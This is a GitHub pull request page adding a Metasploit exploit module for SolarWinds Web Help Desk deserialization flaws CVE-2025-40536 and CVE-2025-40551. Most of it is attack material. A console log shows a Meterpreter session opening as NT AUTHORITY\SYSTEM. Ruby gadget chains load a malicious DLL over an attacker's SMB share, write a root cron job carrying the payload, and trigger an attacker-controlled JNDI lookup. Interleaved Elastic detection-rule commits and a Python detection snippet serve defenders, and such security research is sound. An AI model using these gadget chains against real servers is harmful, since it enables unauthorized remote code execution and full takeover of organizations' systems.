
Add exploit module for SolarWinds Web Help Desk (CVE-2025-40536 + CVE-2025-40551)#20917

Merged
dledda-r7 merged 17 commits into rapid7:master from sfewer-r7:solarwinds-webhelpdesk-rce
Feb 13, 2026

Conversation

@sfewer-r7
Contributor

@sfewer-r7 sfewer-r7 commented Jan 30, 2026

Overview

This is a (draft) pull request to add an exploit module for the SolarWinds Web Help Desk vulnerabilities CVE-2025-40536 and CVE-2025-40551.

The module is based off the Nuclei template by horizon3.ai, except I have added a custom gadget to achieve RCE on Windows targets.

To-Do

  • Add a Linux target. Likely needing an alternative gadget. We can leverage the SQLite technique for a dirty file write which will likely let us drop a cron job for RCE.
  • Documentation

Example

NOTE: If you are using the default Metasploit payloads you will have to disable Defender while testing, alternatively bring your own payloads.

NOTE: You need to run MSF as root so you can bind to a low port (445 for the SMB server). Also, open your firewall for ingress connections.

msf exploit(multi/http/solarwinds_webhelpdesk_rce) > show options 

Module options (exploit/multi/http/solarwinds_webhelpdesk_rce):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   JOHNPWFILE                   no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 hashes, each of which is stored in separate files. Can also be a path.
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, sapni, socks4, socks5, socks5h
   RHOSTS      192.168.86.146   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       8443             yes       The target port (TCP)
   SRVHOST     192.168.86.122   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     445              yes       The local port to listen on.
   SSL         true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       Base path
   VHOST                        no        HTTP server virtual host


Payload options (windows/x64/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST       eth0             yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows (Native code dropper)



View the full module info with the info, or info -d command.

msf exploit(multi/http/solarwinds_webhelpdesk_rce) > check
[*] 192.168.86.146:8443 - Cannot reliably check exploitability. Step 1 - Connection failed
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > check
[+] 192.168.86.146:8443 - The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > exploit 
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > [+] The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
[*] Step 0 - Starting SMB service...
[*] Server is running. Listening on 192.168.86.122:445
[*] Server started.
[*] Malicious SQLite extension UNC: \\192.168.86.122\iBfAAI\OWxxD.dll
[*] Step 1 - Initial session...
[*] Step 2 - Login pref page...
[*] Step 3 - Trigger SAML object...
[*] Step 4 - Create JSON RPC bridge...
[*] Step 5 - Registering the org.sqlite.JDBC driver...
[*] Step 6 - Loading malicious extension over SMB...
[*] Meterpreter session 2 opened (192.168.86.122:4444 -> 192.168.86.146:53030) at 2026-01-30 22:04:02 +0000

msf exploit(multi/http/solarwinds_webhelpdesk_rce) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > pwd
C:\Program Files\WebHelpDesk\bin\webapps\helpdesk
meterpreter > 


@mfreeman451 mfreeman451 left a comment


lgtm

Samirbous added a commit to elastic/detection-rules that referenced this pull request Feb 2, 2026
…rocess

Identifies the SolarWinds Web Help Desk Java process loading an untrusted or remote native module (DLL).
This behavior is uncommon for the Web Help Desk server and may indicate successful exploitation of
deserialization vulnerabilities (CVE-2025-40536, CVE-2025-40551), which allow attackers to load malicious
SQLite extensions and achieve remote code execution.

https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/

rapid7/metasploit-framework#20917
…n can cause a timeout and the service will restart. The MSF session is not affected by this. And the target is re-exploitable after service restarts.
…ts must be POST and not GET, however on newer versions 12.8.* they must be GET
Samirbous added a commit to elastic/detection-rules that referenced this pull request Feb 4, 2026
* [New] Suspicious SolarWinds Web Help Desk Java Module Load or Child Process

Identifies the SolarWinds Web Help Desk Java process loading an untrusted or remote native module (DLL).
This behavior is uncommon for the Web Help Desk server and may indicate successful exploitation of
deserialization vulnerabilities (CVE-2025-40536, CVE-2025-40551), which allow attackers to load malicious
SQLite extensions and achieve remote code execution.

https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/

rapid7/metasploit-framework#20917

* Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml

Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com>

* Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml

Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com>

* Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml

Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com>

---------

Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com>
@sfewer-r7
Contributor Author

Taking this pull request out of draft. We now have a selection of gadgets to target different versions.

Version 12.8.* targets on Windows

We use a custom (novel?) gadget chain to execute arbitrary SQL via a SQLite database connection. The trick is to leverage the com.zaxxer.hikari.HikariDataSource class to execute arbitrary SQL once a successful DB connection has been made. We then force a connection to a SQLite DB to occur via org.sqlite.SQLiteDataSource, and choose an in-memory DB so we know the connection will be successful (and conveniently not touch disk). We also pass the pragma enable_load_extension=true which will allow us to load a native code extension (i.e. a DLL). We supply a UNC path to a remote share for a Metasploit payload. When this chain executes we get RCE. The JDBC driver org.sqlite.JDBC will not be registered in the system, so we begin by simply instantiating this class, as there is a static initializer which will register the driver for us. The whole thing looks like this:

gadgets.push({
  title: 'Registering the org.sqlite.JDBC driver',
  json_data: {
    'javaClass' => 'org.sqlite.JDBC'
  }
})

gadgets.push({
  title: 'Loading malicious extension over SMB',
  json_data: {
    'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
    'driverClassName' => 'org.sqlite.SQLiteDataSource',
    'jdbcUrl' => 'jdbc:sqlite::memory:?enable_load_extension=true',
    'connectionInitSql' => "SELECT load_extension('#{session_ctx[:service].unc}');"
  }
})

Version 12.8.* targets on Linux

For these targets we can use the above SQLite load_extension technique, but Linux won't read from UNC paths. Instead we leverage a dirty-file-write to drop a malicious cron job. The whole thing looks like this:

gadgets.push({
  title: 'Registering the org.sqlite.JDBC driver',
  json_data: {
    'javaClass' => 'org.sqlite.JDBC'
  }
})

gadgets.push({
  title: "Creating file in /etc/cron.d/#{random_name}",
  json_data: {
    'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
    'driverClassName' => 'org.sqlite.SQLiteDataSource',
    'jdbcUrl' => "jdbc:sqlite:/etc/cron.d/#{random_name}",
    'connectionInitSql' => 'CREATE TABLE a (b TEXT UNIQUE);'
  }
})

gadgets.push({
  title: "Dirty file write to /etc/cron.d/#{random_name}",
  json_data: {
    'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
    'driverClassName' => 'org.sqlite.SQLiteDataSource',
    'jdbcUrl' => "jdbc:sqlite:/etc/cron.d/#{random_name}",
    'connectionInitSql' => "INSERT OR IGNORE INTO a (b) VALUES ('\n* * * * * root #{payload.encoded}\n');"
  }
})

This should work, but in my testing the cron daemon on my Ubuntu 22.04 system would not parse the file, failing with errors like cron[427]: Error: bad minute; while reading /etc/cron.d/hax_5 or cron[427]: (*system*haxb) ERROR (Syntax error, this crontab file will be ignored).

I have left this target in the module as some cron daemons might parse the file. The SolarWinds docs recommend Red Hat Linux which I have not tested.

Version 12.7.* targets on Windows or Linux

We use a known technique for these older versions of the product, and leverage ch.qos.logback.core.db.JNDIConnectionSource to load a class over LDAP. Calling setJndiLocation during deserialization forces a javax.naming.InitialContext lookup to be performed on our attacker controlled JNDI location.

gadgets.push({
  title: 'Malicious JNDI lookup via ch.qos.logback.core.db.JNDIConnectionSource',
  json_data: {
    'javaClass' => 'ch.qos.logback.core.db.JNDIConnectionSource', # logback-core.jar
    'jndiLocation' => jndi_string
  }
})
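Two defender-side checks for the artefacts the 12.8.* gadget chains above leave behind, added here as an example and not code from this PR or from Metasploit: on Windows, the Web Help Desk java process loading a native module from a UNC path or an untrusted directory (the behaviour the elastic/detection-rules commit on this thread keys on); on Linux, a file under /etc/cron.d that begins with the SQLite file header instead of crontab text, which is also why cron reports "bad minute" on such a file. The JRE path, the telemetry tuple format and all sample events are assumptions constructed for the example.

```python
"""Constructed checks for post-exploitation artefacts of the WHD SQLite gadget chains."""
import re

# Constructed image-load telemetry as (process image path, loaded module path).
# A real feed would be Sysmon Event ID 7 or an EDR image-load event; the JRE
# path under the WHD install directory is an assumption.
SAMPLE_IMAGE_LOADS = [
    (r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe", r"C:\Windows\System32\ws2_32.dll"),
    (r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe", r"\\192.0.2.10\share\ext.dll"),
    (r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe", r"C:\Users\Public\sqlite_ext.dll"),
    (r"C:\Windows\explorer.exe", r"\\fileserver\tools\helper.dll"),
]

# Only the Web Help Desk java process is in scope for this rule.
WHD_PROCESS = re.compile(r"\\WebHelpDesk\\.*\\java\.exe$", re.IGNORECASE)
# Directories a legitimately loaded native module is expected to come from.
TRUSTED_MODULE_DIRS = ("c:\\windows\\", "c:\\program files\\webhelpdesk\\")


def suspicious_module_loads(events):
    """Return (process, module) pairs where the WHD java process loads a native
    module from a UNC share (the load_extension-over-SMB case) or from any
    directory outside the trusted set."""
    hits = []
    for proc, module in events:
        if not WHD_PROCESS.search(proc):
            continue
        m = module.lower()
        if m.startswith("\\\\") or not m.startswith(TRUSTED_MODULE_DIRS):
            hits.append((proc, module))
    return hits


# Every SQLite database file starts with this 16-byte header string.
SQLITE_MAGIC = b"SQLite format 3\x00"

# Constructed /etc/cron.d listing: path -> first bytes of the file.
SAMPLE_CRON_D = {
    "/etc/cron.d/e2scrub_all": b"30 3 * * 0 root test -e /run/systemd/system || exit 0",
    "/etc/cron.d/hax_5": SQLITE_MAGIC + b"\x10\x00\x01\x01\x00\x40\x20\x20" + b"\x00" * 8,
}


def sqlite_disguised_files(files):
    """Return the paths of crontab-like files whose content is actually a SQLite
    database, i.e. written by a JDBC connection rather than by an administrator."""
    return sorted(path for path, head in files.items() if head.startswith(SQLITE_MAGIC))
```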

@sfewer-r7 sfewer-r7 marked this pull request as ready for review February 4, 2026 20:55
@smcintyre-r7 smcintyre-r7 moved this from Todo to Ready in Metasploit Kanban Feb 5, 2026
…annot change it. We print a message to inform the user this port is intended to be in use so that the SMB server is not completely opaque.
…ARTS due to how the 12.8.* target on Windows works.
eric-forte-elastic pushed a commit to elastic/detection-rules that referenced this pull request Feb 9, 2026
* [New] Suspicious SolarWinds Web Help Desk Java Module Load or Child Process

Identifies the SolarWinds Web Help Desk Java process loading an untrusted or remote native module (DLL).
This behavior is uncommon for the Web Help Desk server and may indicate successful exploitation of
deserialization vulnerabilities (CVE-2025-40536, CVE-2025-40551), which allow attackers to load malicious
SQLite extensions and achieve remote code execution.

https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/

rapid7/metasploit-framework#20917

* Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml

Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com>

* Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml

Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com>

* Update rules/windows/initial_access_potential_webhelpdesk_exploit.toml

Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com>

---------

Co-authored-by: Mika Ayenson, PhD <Mikaayenson@users.noreply.github.com>
@github-project-automation github-project-automation bot moved this from Ready to In Progress in Metasploit Kanban Feb 13, 2026
@dledda-r7 dledda-r7 merged commit a4ec3cd into rapid7:master Feb 13, 2026
18 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Feb 13, 2026
@dledda-r7
Contributor

dledda-r7 commented Feb 13, 2026

Release Notes

This adds an exploit module for SolarWinds Web Help Desk vulnerable to CVE-2025-40536 and CVE-2025-40551. The exploit triggers session opening as NT AUTHORITY\SYSTEM and root.

@cgranleese-r7 cgranleese-r7 added module rn-modules release notes for new or majorly enhanced modules labels Feb 13, 2026